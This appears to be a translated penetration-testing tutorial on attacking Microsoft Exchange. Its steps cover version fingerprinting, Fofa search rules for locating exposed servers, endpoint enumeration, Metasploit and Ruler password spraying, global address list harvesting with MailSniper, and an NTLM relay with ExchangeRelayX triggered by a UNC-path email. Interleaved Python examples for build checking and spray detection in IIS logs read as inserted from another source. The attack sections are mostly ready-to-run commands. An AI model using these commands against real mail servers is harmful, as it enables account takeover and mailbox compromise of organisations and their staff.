Attack Techniques Against Exchange

Exchange Version Identification #

1. Visit the OWA login page

https://<target>/owa

2. Right-click to view the page source and note the version number, here 15.1.1713

3. Visit the page

Exchange Server build numbers and release dates | Microsoft Docs

Comparing against that table, the version is Exchange 2016 CU12
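The lookup described in the three steps above, written out as an added example (not code from the original page): it pulls the build number out of the resource paths an OWA logon page references and maps it to the product family and, for a handful of builds, the cumulative update, so an administrator can confirm that a server in the inventory is on the release it is supposed to be on. The sample HTML is constructed; the `KNOWN_BUILDS` table holds only a few entries taken from Microsoft's public build-number page and is meant to be extended from it, and the `FAMILY` mapping by major.minor is the public Exchange numbering scheme.

```python
import re
from typing import Dict, Optional

# Product family by the major(.minor) part of the build number.
FAMILY = {
    "14": "Exchange 2010",
    "15.0": "Exchange 2013",
    "15.1": "Exchange 2016",
    "15.2": "Exchange 2019",
}

# Small sample of major.minor.build -> release, taken from Microsoft's public
# build-number table; extend it from that page for a real inventory check.
KNOWN_BUILDS = {
    "15.0.1497": "Exchange 2013 CU23",
    "15.1.1713": "Exchange 2016 CU12",
    "15.1.2507": "Exchange 2016 CU23",
    "15.2.1118": "Exchange 2019 CU12",
}

# Constructed sample of an OWA logon page: the resource paths carry the build.
SAMPLE_OWA_HTML = """<!DOCTYPE html><html><head>
<link rel="shortcut icon" href="/owa/auth/15.1.1713/themes/resources/favicon.ico" type="image/x-icon">
<link href="/owa/auth/15.1.1713/themes/resources/logon.css" rel="stylesheet" type="text/css">
</head><body><div id="lgnDiv"></div></body></html>"""

# Matches /owa/auth/<build>/ or /owa/<build>/ resource paths.
BUILD_RE = re.compile(r"/owa/(?:auth/)?(\d+\.\d+\.\d+(?:\.\d+)?)/")


def extract_owa_build(html: str) -> Optional[str]:
    """Return the first build number referenced by the logon page, if any."""
    m = BUILD_RE.search(html)
    return m.group(1) if m else None


def classify_build(build: str) -> Dict[str, Optional[str]]:
    """Map a build string to its product family and (if known) its release."""
    parts = build.split(".")
    # Exchange 2010 is 14.x; the 15.x line is split by the minor number.
    key = parts[0] if parts[0] == "14" else ".".join(parts[:2])
    return {
        "build": build,
        "family": FAMILY.get(key, "unknown product"),
        "release": KNOWN_BUILDS.get(".".join(parts[:3])),
    }


def check_inventory(html: str, expected_release: str) -> Dict[str, Optional[str]]:
    """Compare the build advertised by a logon page with the release the
    inventory says this server should be running."""
    build = extract_owa_build(html)
    if build is None:
        return {"build": None, "family": None, "release": None, "status": "no build found"}
    info = classify_build(build)
    info["status"] = "expected" if info["release"] == expected_release else "mismatch"
    return info


if __name__ == "__main__":
    # The page's own example: 15.1.1713 is Exchange 2016 CU12, so an inventory
    # entry that expects CU23 is reported as a mismatch.
    print(check_inventory(SAMPLE_OWA_HTML, "Exchange 2016 CU23"))
```

The build in the path is also what the Fofa rules in the next section key on; an unknown build with a known family usually just means the table needs refreshing from the Microsoft page, not that the server is misreporting.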

Collecting Exchange with Fofa #

Fofa can also help us quickly collect instances of each Exchange version. These search rules do not match on header, body or title, but the results are quite accurate.

Rough Exchange fingerprint

#fairly accurate
title="Outlook Web App"
body="/owa/auth/"
body="/themes/resources/segoeui-semilight.ttf"

#not very accurate
title="Exchange"

Fingerprints by version

#exchange 2010
app="Microsoft-Exchange-2010-POP3-server-version-03.1" || app="Microsoft-Exchange-Server-2010"

#exchange 2013
app="Microsoft-Exchange-2013" || app="Microsoft-Exchange-Server-2013-CU21" || app="Microsoft-Exchange-Server-2013-CU17" || app="Microsoft-Exchange-Server-2013-CU23" || app="Microsoft-Exchange-Server-2013-CU13" || app="Microsoft-Exchange-Server-2013-CU22" || app="Microsoft-Exchange-Server-2013-CU11" || app="Microsoft-Exchange-Server-2013-CU2" || app="Microsoft-Exchange-Server-2013-CU16" || app="Microsoft-Exchange-Server-2013-CU19" || app="Microsoft-Exchange-Server-2013-CU3" || app="Microsoft-Exchange-Server-2013-CU18" || app="Microsoft-Exchange-Server-2013-CU5" || app="Microsoft-Exchange-Server-2013-CU20" || app="Microsoft-Exchange-Server-2013-CU12" || app="Microsoft-Exchange-Server-2013-CU15" || app="Microsoft-Exchange-Server-2013-CU10" || app="Microsoft-Exchange-Server-2013-CU9" || app="Microsoft-Exchange-Server-2013-CU6" || app="Microsoft-Exchange-Server-2013-CU7" || app="Microsoft-Exchange-Server-2013-CU1" || app="Microsoft-Exchange-Server-2013-CU14" || app="Microsoft-Exchange-Server-2013-CU8" || app="Microsoft-Exchange-Server-2013-RTM" || app="Microsoft-Exchange-Server-2013-SP1" || app="Microsoft-Exchange-2013"

#exchange 2016 (Fofa reports that the rule does not exist)
app="Microsoft-Exchange-Server-2016-CU19" || app="Microsoft-Exchange-Server-2016-CU3" || app="Microsoft-Exchange-Server-2016-CU12" || app="Microsoft-Exchange-Server-2016-RTM" || app="Microsoft-Exchange-Server-2016-CU7" || app="Microsoft-Exchange-Server-2016-CU17" || app="Microsoft-Exchange-Server-2016-CU2" || app="Microsoft-Exchange-Server-2016-CU1" || app="Microsoft-Exchange-Server-2016-CU14" || app="Microsoft-Exchange-Server-2016-CU5" || app="Microsoft-Exchange-Server-2016-CU11" || app="Microsoft-Exchange-Server-2016-CU9" || app="Microsoft-Exchange-Server-2016-CU16" || app="Microsoft-Exchange-Server-2016-CU10" || app="Microsoft-Exchange-Server-2016-CU6" || app="Microsoft-Exchange-Server-2016-CU13" || app="Microsoft-Exchange-Server-2016-CU18" || app="Microsoft-Exchange-Server-2016-CU8" || app="Microsoft-Exchange-Server-2016-CU4" || app="Microsoft-Exchange-2016-POP3-server"

#exchange 2019
app="Microsoft-Exchange-Server-2019-CU5"||app="Microsoft-Exchange-Server-2019-CU3"||app="Microsoft-Exchange-Server-2019-Preview"||app="Microsoft-Exchange-Server-2019-CU8"||app="Microsoft-Exchange-Server-2019-CU1"||app="Microsoft-Exchange-Server-2019-CU7"||app="Microsoft-Exchange-Server-2019-CU2"||app="Microsoft-Exchange-Server-2019-CU6"||app="Microsoft-Exchange-Server-2019-RTM"||app="Microsoft-Exchange-Server-2019-CU4"

Locating the internal Exchange server via SPN #

setspn -Q IMAP/* | findstr "exchange"


Collecting Exchange interfaces with msmailprobe #

Get the Exchange interfaces and login entry points

git clone https://github.com/busterb/msmailprobe.git
cd msmailprobe/
go build msmailprobe.go
./msmailprobe identify -t <exchange-hostname>.<domain>

When outside the domain, first add a hosts entry: vim /etc/hosts

./msmailprobe identify -t mail.test.lab

It identifies the endpoints that are prone to account enumeration, as well as some exposed interfaces.

Password spraying against Exchange login endpoints #

Password spraying the OWA login with msf #

Once we have obtained the Exchange interfaces and login entry points, we can use msf for password spraying; a username and password wordlist is needed. During the actual spraying run, keep the thread count as low as possible: better slow, accurate and steady than fast, hasty and wrong.

use auxiliary/scanner/http/owa_login
set USER_FILE ./user.txt
set PASS_FILE ./pass.txt
set STOP_ON_SUCCESS false
run

Password spraying EWS with msf #

Exchange Web Services (EWS) is a set of API programming interfaces provided by Exchange for operating Exchange functionality; the EWS interface can also be brute-forced and password-sprayed.

However, on this page, even with a correct mailbox, it apparently still cannot log in

But by brute-forcing this page, we can still obtain correct mailbox account passwords

use auxiliary/scanner/http/owa_ews_login
set rhosts 192.168.10.6
set user_file ./user.txt
set PASS_FILE ./pass.txt
set stop_on_success false
run

Getting all Exchange mailbox users with mailsniper.ps1 #

MailSniper is a penetration testing tool for searching email in a Microsoft Exchange environment for specific terms (passwords, internal intelligence, network architecture information, etc.). It can be used as a non-administrative user to search that user's own email, or by an Exchange administrator to search the mailbox of every user in the domain.

MailSniper also includes additional modules for password spraying, enumerating users and domains, gathering the Global Address List (GAL) from OWA and EWS, and checking mailbox permissions for every Exchange user in the organization.

Project: https://github.com/dafthack/MailSniper

Collect mailboxes in preparation for the subsequent brute-force

Prerequisites

  • Have the account password of one user mailbox, and be able to log in to Outlook with it
  • The ps1 can only be run after logging in as a domain user

For example, we have logged in as an ordinary domain user and obtained a mailbox account and password (demo / demo.com) that can log in to Outlook

powershell -exec bypass
Import-Module .\MailSniper.ps1
Get-GlobalAddressList -ExchHostname <outlook address> -UserName <domain user> -Password <known mailbox password> -OutFile <output>.txt
Get-GlobalAddressList -ExchHostname mail.test.lab -UserName demo -Password demo.com
# -ExchHostname: ping -a <exchange server ip> -> hostname -> hostname.domain (mail.test.lab)

All mailboxes are exported

Password spraying internal Exchange mailbox users with Ruler #

Ruler can perform password spraying from Linux, Windows or macOS, since it is cross-platform. With the mailbox list obtained above, the spraying can be carried out.

Project: https://github.com/sensepost/ruler

ruler-win64.exe --domain test.lab -k brute --users userlist.txt --passwords pass.txt --delay 0 --threads 10 -v
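The OWA, EWS and Ruler spraying runs in the three sections above all leave the same trace on the server side: one source address producing authentication failures across many different accounts. The following is an added example, not part of the original page, showing how a defender would pick that pattern out of Exchange's IIS logs. The log lines are constructed in IIS W3C format with a reduced field set; the failure indicators used (an OWA form logon redirected back to logon.aspx with reason=2, and a 401 on /EWS/Exchange.asmx that carried a username) are the standard IIS-side signs of a bad credential, and the thresholds and window are assumed values to tune per environment.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

# Constructed sample in IIS W3C format. 203.0.113.9 tries a password against
# many distinct accounts on EWS (the spray pattern); 198.51.100.4 is a single
# user who mistyped their OWA password twice and then authenticated normally.
SAMPLE_IIS_LOG = r"""#Software: Microsoft Internet Information Services 10.0
#Fields: date time cs-method cs-uri-stem cs-uri-query cs-username c-ip sc-status
2021-06-01 08:00:01 POST /EWS/Exchange.asmx - test\alice 203.0.113.9 401
2021-06-01 08:00:03 POST /EWS/Exchange.asmx - test\bob 203.0.113.9 401
2021-06-01 08:00:05 POST /EWS/Exchange.asmx - test\carol 203.0.113.9 401
2021-06-01 08:00:07 POST /EWS/Exchange.asmx - test\dave 203.0.113.9 401
2021-06-01 08:00:09 POST /EWS/Exchange.asmx - test\erin 203.0.113.9 401
2021-06-01 08:00:11 POST /EWS/Exchange.asmx - test\frank 203.0.113.9 401
2021-06-01 08:00:12 POST /EWS/Exchange.asmx - - 203.0.113.9 401
2021-06-01 08:01:00 GET /owa/auth/logon.aspx replaceCurrent=1&reason=2 - 198.51.100.4 200
2021-06-01 08:01:20 GET /owa/auth/logon.aspx replaceCurrent=1&reason=2 - 198.51.100.4 200
2021-06-01 08:02:00 POST /EWS/Exchange.asmx - test\bob 198.51.100.4 200
"""


def parse_iis(text: str) -> List[Dict[str, str]]:
    """Parse W3C lines into dicts keyed by the names in the #Fields directive."""
    fields = None
    events = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line.strip() or line.startswith("#") or fields is None:
            continue
        parts = line.split()
        if len(parts) == len(fields):
            events.append(dict(zip(fields, parts)))
    return events


def is_failed_logon(ev: Dict[str, str]) -> bool:
    """A failed OWA form logon (sent back to logon.aspx with reason=2), or a
    401 on EWS that carried a username. The bare 401 challenge that precedes
    any authenticated request has cs-username '-' and is not a failure."""
    stem = ev["cs-uri-stem"].lower()
    if stem == "/owa/auth/logon.aspx" and "reason=2" in ev["cs-uri-query"].lower():
        return True
    return stem.startswith("/ews/") and ev["sc-status"] == "401" and ev["cs-username"] != "-"


def detect_spray(events: List[Dict[str, str]], window: timedelta = timedelta(hours=1),
                 min_failures: int = 5, min_users: int = 3) -> Dict[str, dict]:
    """Per source IP, look for any time window holding at least min_failures
    failures. When usernames are logged (EWS), also require min_users distinct
    accounts so one person's typos are not flagged; OWA form logons log no
    username, so there only the count applies. A long window is what catches
    the slow, low-thread spraying the sections above recommend."""
    by_ip = defaultdict(list)
    for ev in events:
        if is_failed_logon(ev):
            ts = datetime.strptime(f"{ev['date']} {ev['time']}", "%Y-%m-%d %H:%M:%S")
            by_ip[ev["c-ip"]].append((ts, ev["cs-username"]))
    alerts: Dict[str, dict] = {}
    for ip, fails in by_ip.items():
        fails.sort()
        start = 0
        for end in range(len(fails)):
            # Slide the window start forward until it fits within `window`.
            while fails[end][0] - fails[start][0] > window:
                start += 1
            span = fails[start:end + 1]
            users = {u for _, u in span if u != "-"}
            if len(span) >= min_failures and (not users or len(users) >= min_users):
                if ip not in alerts or len(span) > alerts[ip]["failures"]:
                    alerts[ip] = {"failures": len(span), "distinct_users": len(users),
                                  "first": span[0][0].isoformat(),
                                  "last": span[-1][0].isoformat()}
    return alerts


if __name__ == "__main__":
    for ip, a in detect_spray(parse_iis(SAMPLE_IIS_LOG)).items():
        print(f"possible password spray from {ip}: {a}")
```

Windows Security event 4625 on the Exchange server gives the same signal with the account name filled in for every failure, which makes the distinct-user test more reliable than the IIS view; the IIS log has the advantage of naming the endpoint (OWA, EWS, ActiveSync) that was sprayed.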

Reference: Password spraying attacks against Outlook Web Access: gaining access to target machines - redteam101

Relaying to internal Exchange with ExchangeRelayX #

Microsoft Exchange supports many services, such as ActiveSync, EWS and OWA. Some of them (MAPI, RPC and EWS) support NTLM authentication by default, which can allow red teamers to carry out an NTLM relay attack.

ExchangeRelayX demonstrates an attacker's ability to perform an SMB- or HTTP-based NTLM relay attack against the EWS endpoint of an on-premises Microsoft Exchange server in order to compromise the victim's mailbox. The tool gives the attacker an OWA-like interface with access to the user's mailbox and contacts.

Download: https://github.com/quickbreach/ExchangeRelayX

#Use the exchangeRelayx.py script to check whether the Exchange Server supports NTLM authentication:
python3 exchangeRelayx.py -c -t https://192.168.10.6
# the -t parameter is the IP address of the Exchange server
# But the script would not run for me here
  1. Check whether the Exchange service performs NTLM authentication
  2. If it does, carry out the relay attack directly: exchangeRelayx.py -t https://192.168.10.6 starts a web server listening on local port 8000, and as soon as a relay succeeds the page shows the user it succeeded for
  3. Send an email containing a UNC path to Exchange; as soon as it is clicked, the relay happens